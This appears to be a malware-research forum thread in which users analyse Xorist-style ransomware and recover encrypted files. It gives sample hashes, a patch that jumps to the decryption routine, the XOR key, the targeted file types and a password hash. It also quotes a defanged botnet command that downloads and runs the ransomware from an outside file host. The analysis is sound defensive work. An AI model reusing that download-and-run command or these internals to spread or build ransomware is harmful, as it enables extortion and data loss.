[malwarian]

One of my customer PC was infected by this rogue which had all file extensions changed to lnk.EnCrYpTeD

I used both dr web tool with -85 and kaspersky tool

dr web tool said that it decrypted 12000 files and kaspersky tool decrypted 6000 files but nothing changed.

Deleted all keys related to EnCrYpTeD in registry still nothing worked :(

[Blitskrieg]

One of my customer PC was infected by this rogue which had all file extensions changed to lnk.EnCrYpTeD

I used both dr web tool with -85 and kaspersky tool

dr web tool said that it decrypted 12000 files and kaspersky tool decrypted 6000 files but nothing changed.

Deleted all keys related to EnCrYpTeD in registry still nothing worked :(

Are utilities not decrypted all files or partially? Could you attach 2-3 of problem files?

[malwarian]

I was able to solve that

Decrypting each of the .lnk.EnCyRpTeD file extracted three files .lnk(0) ,.lnk(1) and the original file.Deleted the other two files ;)

Thanks Blitskrieg for taking time to respond.I dont have the PC now

[patriq]

Generic ransomware pushed to small ZeuS botnet machines by script:

user_execute hxxp://ge.tt/api/1/files/4k8mPe82/0/blob?download >> (informations.exe)

zeus script.png (835.88 KiB) Viewed 700 times

ec2b6ecfc8ca67f9357b6550166a0838 informations.exe (UPX)
6ec6069728a91a04407283bc6bf208b7 UNPACKED

Some generic ransomware junk..run in VM it asks for a password to decrypt files so I thought I would try to crack.

winxp.png (590.39 KiB) Viewed 700 times

I'm not a great RE like most ppl on here so I gave up and just patched the binary :D

Change 00401C19 > JMP 0040124F (decryption routine)

Attached are samples and patched binary in case anyone needs to unlock stuff... I was surprised, the malware does decrypt everything.. I did not look into the encryption routine or the password too much, but I'm sure someone around here can figure it out.

[slipstream-]

Decided to do some static analysis, first time on crypto ransomware.

The config is stored in the resources, under BITMAP->14. First 16 bytes are the xor key, the rest is the content, simple decryption - for (int i = 0; i < config_length; i++) config ^= xorkey[i % 16];

Targeted files: *.zip *.rar *.7z *.tar *.gzip *.jpg *.jpeg *.psd *.cdr *.dwg *.max *.bmp *.gif *.png *.doc *.docx *.xls *.xlsx *.ppt *.pptx *.txt *.pdf *.djvu *.mdb *.cer *.pl2 *.pfx *.lcd *.md *.mdf *.dbf *.odt *.vob *.ifo *.lnk *.torrent *.mov *.m2v *.3gp *.mpeg *.mpg *.flv *.avi *.mp4 *.wmv *.divx *.mkv *.mp3 *.wav *.flac *.ape *.wma *.ac3 *.sql *wallet*.dat

After further static analysis, seems it uses the exact same xorkey to decrypt the config as it does to encrypt the files, but this time it does dword xors rather than byte xors.

[ 0x312380da, 0xc9246d86, 0x099f28e8, 0xd48d2804 ]

Valid password is stored in the config, btw. md5(md5(md5(md5(md5(password))))) = cfe27cf06d928fe42d9d8082ad2c9afd

[FafZee]

Yow,

Xor key : DA 80 23 31 86 6D 24 C9 E8 28 9F 09 04 28 8D D4
start after 20bytes from begin of file.

faf'

[patriq]

Kaspersky called a similar sample: Trojan-Ransom.Win32.Xorist

String from sample:
0p3nSOurc3 X0r157

I think its just XOR encoding not encryption - as I did see XOR operations in the debugger, i don't recall seeing any Crypto api imports.

[FafZee]

Sorry for second post, can't edit first :/
Key is hardcoded at 0x557E18 in memory and 0x1c9810 in file.

Faf'

[EP_X0FF]

This is based on the open-source encoder from vazonez script-kiddie. Moved.